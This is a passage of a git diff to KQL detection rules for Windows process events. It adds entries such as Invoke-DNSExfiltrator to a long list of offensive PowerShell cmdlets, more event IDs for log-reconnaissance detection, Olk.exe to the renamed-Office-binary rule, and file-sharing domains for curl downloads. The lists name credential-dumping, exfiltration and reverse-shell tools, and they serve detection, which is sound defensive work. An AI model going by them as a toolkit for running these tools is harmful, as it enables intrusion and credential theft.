RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql index a8fe0a43..93509013 100644 --- a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql +++ b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql @@ -7,4 +7,4 @@ // Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 DeviceProcessEvents -| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file +| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DNSExfiltrator" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql index a0a3c7e4..a3e98fd2 100644 --- a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql +++ b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql @@ -5,9 +5,9 @@ // Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. // This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. // MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.discovery, attack.t1552 +// Tags: attack.credential-access, attack.discovery, attack.t1552, attack.t1087 // False Positives: // - Legitimate usage of the utility by administrators to query the event log DeviceProcessEvents -| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file +| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains ".ID -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains ".ID -eq 4778" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "System[EventID=4778]" or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains ".ID -eq 25" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25") or ProcessCommandLine contains "System[EventID=25]" or ProcessCommandLine contains "-InstanceId 1149" or ProcessCommandLine contains ".eventid -eq 1149" or ProcessCommandLine contains ".ID -eq 1149" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "1149") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "1149") or ProcessCommandLine contains "System[EventID=1149]" or ProcessCommandLine contains "-InstanceId 21" or ProcessCommandLine contains ".eventid -eq 21" or ProcessCommandLine contains ".ID -eq 21" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "21") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "21") or ProcessCommandLine contains "System[EventID=21]" or ProcessCommandLine contains "-InstanceId 22" or ProcessCommandLine contains ".eventid -eq 22" or ProcessCommandLine contains ".ID -eq 22" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "22") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "22") or ProcessCommandLine contains "System[EventID=22]") or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql index 97294b8a..0a07c0bf 100644 --- a/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql +++ b/KQL/rules/windows/process_creation/renamed_office_binary_execution.kql @@ -4,7 +4,7 @@ // Level: high // Description: Detects the execution of a renamed office binary // MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion +// Tags: attack.defense-evasion, attack.t1036.003 DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe"))) \ No newline at end of file +| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe", "Olk.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe" or FolderPath endswith "\\OLK.EXE"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql index 78285879..f07667f3 100644 --- a/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql +++ b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql @@ -7,4 +7,4 @@ // Tags: attack.execution DeviceProcessEvents -| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains 